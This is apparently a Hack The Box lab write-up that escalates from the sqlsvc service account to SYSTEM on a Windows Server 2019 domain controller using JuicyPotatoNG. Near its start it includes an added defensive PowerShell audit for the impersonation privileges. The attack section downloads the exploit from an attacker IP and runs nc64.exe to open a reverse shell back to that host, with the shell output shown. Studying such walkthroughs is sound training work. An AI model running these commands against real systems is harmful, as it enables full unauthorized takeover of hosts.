JuicyPotatoNG
The sqlsvc user has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set. This makes the target system vulnerable to the Potato family of token-impersonation exploits.
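As an added defensive check (not part of the original write-up), the following PowerShell audits which principals have been explicitly granted the two privileges called out above, so an administrator can find service accounts carrying them before a Potato-style escalation does. It uses secedit's exported local policy; the temporary file path and the list of "expected" default holders are assumptions of this example.

```powershell
# Added example, not from the original page: list explicit holders of
# SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege on this host.
# Run from an elevated PowerShell. $cfg is an arbitrary writable path (assumption).
$cfg = Join-Path $env:TEMP 'secpol-audit.inf'
secedit /export /cfg $cfg | Out-Null

$watch = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'

# Only the [Privilege Rights] section of the exported INF is of interest.
$inSection = $false
$findings = foreach ($line in (Get-Content $cfg)) {
    if ($line -match '^\[(.+)\]$') {
        $inSection = ($Matches[1] -eq 'Privilege Rights')
        continue
    }
    if (-not $inSection) { continue }

    $name, $value = $line -split '\s*=\s*', 2
    if ($watch -notcontains $name) { continue }

    foreach ($entry in ($value -split ',')) {
        $entry = $entry.Trim()
        if (-not $entry) { continue }
        # secedit writes SIDs prefixed with '*'; plain names appear as-is.
        $holder = $entry
        if ($entry.StartsWith('*')) {
            try {
                $sid = New-Object System.Security.Principal.SecurityIdentifier ($entry.Substring(1))
                $holder = $sid.Translate([System.Security.Principal.NTAccount]).Value
            } catch {
                $holder = $entry   # unresolvable SID: keep the raw value for review
            }
        }
        [pscustomobject]@{ Privilege = $name; Holder = $holder }
    }
}

# Holders present on a default install (assumed baseline); anything else is a finding.
$expected = 'BUILTIN\Administrators',
            'NT AUTHORITY\SERVICE',
            'NT AUTHORITY\LOCAL SERVICE',
            'NT AUTHORITY\NETWORK SERVICE'

$findings | Sort-Object Privilege, Holder | Format-Table -AutoSize
$findings | Where-Object { $expected -notcontains $_.Holder } |
    ForEach-Object { Write-Warning "Non-default holder of $($_.Privilege): $($_.Holder)" }

Remove-Item $cfg -ErrorAction SilentlyContinue
```

This surfaces explicit grants only: every Windows service also receives SeImpersonatePrivilege implicitly through NT AUTHORITY\SERVICE, so the actionable finding is usually a named service account holding SeAssignPrimaryTokenPrivilege (database engines such as SQL Server request it at install). Where a service can run without it, remove the grant or move the service to a virtual or group managed service account so a compromise of that service does not hand an attacker a token-impersonation path.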
I would usually use JuicyPotato for token impersonation, but it does not work on anything above Windows 10 1809 and Windows Server 2019. The target system is Windows Server 2019, so I would need something else.
There is a newer version of JuicyPotato called JuicyPotatoNG that works. It
- is the newest version of the Potato exploits
- uses a spoofing technique to bypass the Windows Firewall restriction (if enabled)
- is able to exploit LOCALLY
- more info can be found here
Exploit
The binary can be downloaded from the official GitHub repo.
Exploitation
ps c:\Temp> iwr http://10.10.14.9/JuicyPotatoNG.exe -outfile C:\Temp\JuicyPotatoNG.exe
Delivery complete
c:\Temp>.\JuicyPotatoNG.exe -t * -p C:\Temp\nc64.exe -a "10.10.14.9 1234 -e cmd"
JuicyPotatoNG
by decoder_it & splinter_code
[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247
[+] authresult success {854A20FB-2D44-457D-992F-EF13785D2B51};NT AUTHORITY\SYSTEM;Impersonation
[+] CreateProcessAsUser OK
[+] Exploit successful!
Launching the exploit
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.168] 63831
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\> whoami
whoami
nt authority\system
c:\> hostname
hostname
DC1
c:\> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::181
ipv6 address. . . . . . . . . . . : dead:beef::8516:7ac6:78b:c7b
link-local ipv6 address . . . . . : fe80::8516:7ac6:78b:c7b%14
ipv4 address. . . . . . . . . . . : 10.10.11.168
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%14
10.10.10.2
System Level Compromise